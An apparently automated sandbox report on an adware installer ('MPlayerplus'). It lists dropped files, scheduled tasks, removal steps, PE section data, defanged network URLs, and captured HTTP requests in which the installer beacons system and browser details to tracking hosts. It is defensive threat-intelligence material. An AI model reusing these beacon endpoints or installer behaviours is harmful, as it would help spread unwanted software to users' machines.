%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-5.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\104.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\220.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\233.js (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\37.js (2 bytes)
%Program Files%\MPlayerplus_01\Uninstall.exe (601 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-3.job (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-1.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\InstallerUtils2.dll (3312 bytes)
%WinDir%\Tasks\temp_772406a5-70fe-462f-841c-e18bdccbdc78-2.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\195.js (378 bytes)
%Program Files%\MPlayerplus_01\54246.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdateHelper.msi (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins.json (15 bytes)
%Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-3.exe (13122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\226.js (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\260954 (973591 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\38.js (2 bytes)
%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00157D19_Rar\%original file name%.exe (61184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (265148 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Zvbbyym.tmp (248938 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Iufkopcpdfjpcg.exe (983586 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\WrapperUtils.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\263[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\286[1].js (975 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\93[1].js (951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\281[1].js (483 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\246[1].js (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\233[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\244[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\260[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\192[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\bg_code[1].js (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\104[1].js (919 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\195[1].js (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\289[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\273[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\262[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\42[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1_7_1_min[1].js (44457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\242[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\102[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\91[1].js (86201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\211[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\221[1].js (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\269[1].js (491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\220[1].js (13921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\275[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app_code[1].js (736 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\230[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\set_campaign_id_m[1].js (508 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Goegljtz
Product Name: Oujmyxypscw
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 22.6.3.9
File Description: Odyqmjhkphi
Comments:
Language: English (United States)
Company Name: GoegljtzProduct Name: OujmyxypscwProduct Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 22.6.3.9File Description: OdyqmjhkphiComments: Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 34880 | 35328 | 4.14627 | 8b211302c668146bb8cce549607b031f |
| .data | 40960 | 140 | 512 | 0.818128 | a5a710a52d844b19513b2cab5693dbc3 |
| .rdata | 45056 | 9108 | 9216 | 4.0908 | 004265d16597098398ce8e06897dcd29 |
| .bss | 57344 | 252880 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 311296 | 4868 | 5120 | 3.64756 | 20f692042b54593897a705a64d67ce50 |
| .ndata | 319488 | 376832 | 8192 | 0 | 0829f71740aab1ab98b33eae21dee122 |
| .rsrc | 696320 | 98304 | 95232 | 5.40652 | cd8147b56e991064a2e5c04b62e8a51c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=0&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1413862412&procruntime=10&rnd=1413862422 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/monetization.gif?event=3&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359&app=54246&bhover=1_34_05_12&xpiver=0_94&crxver=1_26_33&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1413862412&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de | |
| hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
| hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
| hxxp://e6845.ce.akamaiedge.net/ThawteTimestampingCA.crl | |
| hxxp://e6845.ce.akamaiedge.net/tss-ca-g2.crl | |
| hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&campaign=001359&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=33&bgver=1&pluginsver=27&curtime=1413862412&lifetime=0&rnd=2940 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/54246/manifest/1_34_05_12/ie6/manifest.xml?ver=33&rnd=4638 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=3095 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/54246/js/na/ie/app_code.js?ver=102&rnd=6758 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/54246/bg/na/ie/bg_code.js?ver=2&rnd=3013 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098&w=3:uxP7lqHPgjR31A1VCO5ingXndb1rFK_KAHySpOeS13mFOEtsynLmgcq7I6NOZRbf7J9PCORCxJAYvLQBx2b-1W8C0I5TnOv5uontBSViwgQRQhARK-F_MdynNh4BLVWmYQSh2YIjyRn92lVEe91SjRxOzYFYrMl6EX22_Crgr2Q | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/54246/plugins/na/ie/plugins.json?ver=93&rnd=9729 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/42.js?ver=10&rnd=41 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/281.js?ver=2&rnd=41 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/275.js?ver=3&rnd=41 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/286.js?ver=2&rnd=41 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/289.js?ver=1&rnd=41 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/273.js?ver=4&rnd=41 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/260.js?ver=4&rnd=41 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/262.js?ver=2&rnd=41 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/244.js?ver=5&rnd=41 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/263.js?ver=2&rnd=41 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/242.js?ver=4&rnd=8467 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/233.js?ver=7&rnd=8467 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/230.js?ver=7&rnd=8467 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/223.js?ver=8&rnd=8467 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/221.js?ver=4&rnd=8467 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/211.js?ver=7&rnd=8467 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/195.js?ver=28&rnd=8467 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/monetization.gif?rand=3098&event=7&agent_type=2&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/220.js?ver=23&rnd=8467 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/192.js?ver=9&rnd=8467 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/184.js?ver=10&rnd=6334 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/180.js?ver=12&rnd=6334 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/104.js?ver=12&rnd=6334 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/102.js?ver=10&rnd=6334 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/93.js?ver=13&rnd=6334 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/91.js?ver=85&rnd=6334 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/269.js?ver=1&rnd=6334 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/246.js?ver=15&rnd=6334 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6334 | |
| hxxp://cds.m9u9b7r5.hwcdn.net/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/ping.xml?rand=3105 | |
| hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&subid=0&zdata=0&appver=102&bgver=2&pluginsver=93&curtime=1413862438&lifetime=26&oldappver=33&oldbgver=1&oldpluginsver=27&rnd=793 | |
| hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1413862412&procruntime=30&rnd=1413862442 | |
| hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&installtime=1413862412&curtime=1413862412&lifetime=0&silent=1&procstarttime=1413862412&procruntime=30&rnd=1413862442 | |
| hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | 212.30.134.169 |
| hxxp://js.newdatastatsserv.com/plugins/mins/230.js?ver=7&rnd=8467 | 69.16.175.42 |
| hxxp://ts-crl.ws.symantec.com/tss-ca-g2.crl | 23.43.133.163 |
| hxxp://update.clientstaticserv.com/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/ping.xml?rand=3105 | |
| hxxp://stats.clientstaticserv.com/apps.gif?action=update&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&subid=0&zdata=0&appver=102&bgver=2&pluginsver=93&curtime=1413862438&lifetime=26&oldappver=33&oldbgver=1&oldpluginsver=27&rnd=793 | 176.32.100.193 |
| hxxp://stats.clientstaticserv.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=0&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1413862412&procruntime=10&rnd=1413862422 | 176.32.100.193 |
| hxxp://js.newdatastatsserv.com/plugins/mins/91.js?ver=85&rnd=6334 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/184.js?ver=10&rnd=6334 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/223.js?ver=8&rnd=8467 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/262.js?ver=2&rnd=41 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6334 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/275.js?ver=3&rnd=41 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 | 69.16.175.42 |
| hxxp://update.clientstaticserv.com/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098&w=3:uxP7lqHPgjR31A1VCO5ingXndb1rFK_KAHySpOeS13mFOEtsynLmgcq7I6NOZRbf7J9PCORCxJAYvLQBx2b-1W8C0I5TnOv5uontBSViwgQRQhARK-F_MdynNh4BLVWmYQSh2YIjyRn92lVEe91SjRxOzYFYrMl6EX22_Crgr2Q | |
| hxxp://js.newdatastatsserv.com/plugins/mins/281.js?ver=2&rnd=41 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugin/apps/54246/plugins/na/ie/plugins.json?ver=93&rnd=9729 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugin/apps/54246/js/na/ie/app_code.js?ver=102&rnd=6758 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/263.js?ver=2&rnd=41 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/244.js?ver=5&rnd=41 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/220.js?ver=23&rnd=8467 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/246.js?ver=15&rnd=6334 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/93.js?ver=13&rnd=6334 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/269.js?ver=1&rnd=6334 | 69.16.175.42 |
| hxxp://update.clientstaticserv.com/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098 | |
| hxxp://update.clientstaticserv.com/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=3095 | |
| hxxp://js.newdatastatsserv.com/plugins/mins/102.js?ver=10&rnd=6334 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/104.js?ver=12&rnd=6334 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/180.js?ver=12&rnd=6334 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/221.js?ver=4&rnd=8467 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/273.js?ver=4&rnd=41 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/233.js?ver=7&rnd=8467 | 69.16.175.42 |
| hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | 212.30.134.169 |
| hxxp://js.newdatastatsserv.com/plugins/mins/260.js?ver=4&rnd=41 | 69.16.175.42 |
| hxxp://stats.clientstaticserv.com/stats.gif?action=daily&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&campaign=001359&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=33&bgver=1&pluginsver=27&curtime=1413862412&lifetime=0&rnd=2940 | 176.32.100.193 |
| hxxp://js.newdatastatsserv.com/plugins/mins/42.js?ver=10&rnd=41 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugin/apps/54246/bg/na/ie/bg_code.js?ver=2&rnd=3013 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/242.js?ver=4&rnd=8467 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/211.js?ver=7&rnd=8467 | 69.16.175.42 |
| hxxp://crl.thawte.com/ThawteTimestampingCA.crl | 23.43.133.163 |
| hxxp://logs.clientstaticserv.com/monetization.gif?rand=3098&event=7&agent_type=2&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359 | 69.16.175.10 |
| hxxp://js.newdatastatsserv.com/plugins/mins/195.js?ver=28&rnd=8467 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/192.js?ver=9&rnd=8467 | 69.16.175.42 |
| hxxp://js.newdatastatsserv.com/plugins/mins/286.js?ver=2&rnd=41 | 69.16.175.42 |
| hxxp://stats.clientstaticserv.com/apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&installtime=1413862412&curtime=1413862412&lifetime=0&silent=1&procstarttime=1413862412&procruntime=30&rnd=1413862442 | 176.32.100.193 |
| hxxp://js.clientstaticserv.com/plugin/apps/54246/manifest/1_34_05_12/ie6/manifest.xml?ver=33&rnd=4638 | 69.16.175.42 |
| hxxp://logs.clientstaticserv.com/monetization.gif?event=3&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359&app=54246&bhover=1_34_05_12&xpiver=0_94&crxver=1_26_33&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1413862412&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de | 69.16.175.10 |
| hxxp://js.newdatastatsserv.com/plugins/mins/289.js?ver=1&rnd=41 | 69.16.175.42 |
| hxxp://stats.clientstaticserv.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1413862412&procruntime=30&rnd=1413862442 | 176.32.100.193 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /monetization.gif?event=3&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359&app=54246&bhover=1_34_05_12&xpiver=0_94&crxver=1_26_33&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1413862412&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de HTTP/1.1
Host: logs.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:42 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1413862422.dop010.am4.t,1413862422.cds058.am4.c
GIF89a.............,...........D..;..
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT
Accept-Ranges: bytes
ETag: "80179bc4b3cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=10211
Date: Tue, 21 Oct 2014 03:33:49 GMT
Connection: keep-alive
X-CCC: NO
X-CID: 2
1401CFCEB3C4C42958....
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT
Accept-Ranges: bytes
ETag: "805a83f2b9cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 56928
Cache-Control: max-age=10076
Date: Tue, 21 Oct 2014 03:33:49 GMT
Connection: keep-alive
X-CCC: NO
X-CID: 2
MSCF....`.......,...................I.................,E.Y .authroot.stl..Y-..8..CK...<T...g.v!M.d..f.%d..}K..5..F. ...T..%.,YJ.,!T......_..x.<=O.....yy....;3..>.|..~..\.....|......;..8..~.za...."A...q.......g..m......<X........j"I........!..-w.....w....P...H..(.?}..2.N. .u..a. ...=.C..D.F>rC.. ..|).=.. ..3b.8H.M...(...u8.%...W.g...\YB.m:.....dE.........V....$....Dn:....0...S."...o..q.....K...I..K...(x%....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,....`0$z.@..&.x"....T..H...<........~..E..".....<<.\B(.....................@.....L.........KNAy8/"...f.......k..Jm7j....R.5q....Rz..!@...].......Y.[........4.. .D8..&...t.J^O..Q.._..1.J.m5<'k.,....%T....i.\.;.;q..S./ 8.?Bu.............}D.Q....L....*..[.."e......15m..._.0.M........#..v!..<...@..?sc.y....*.....tX[........{.W4.Q...^u@..*..QP.......~.L9N....2r...4.....B..-\(...b.d...K...O.8..Un.......V.<.......A...V.....(..s..f..q.{N0.hS.,..;M.|G|.@.M.._.....7._6...C.0...A;L....%...M=Y.....f.JV.(.5.....0..?*...KZ....jM...8.6U...#...ew.?..?...........WE.Or..O>..{.'W2.........3m.O.u..Z8....H4@.w}.o:?~....]<!...%....}@.d...L.p.a.g 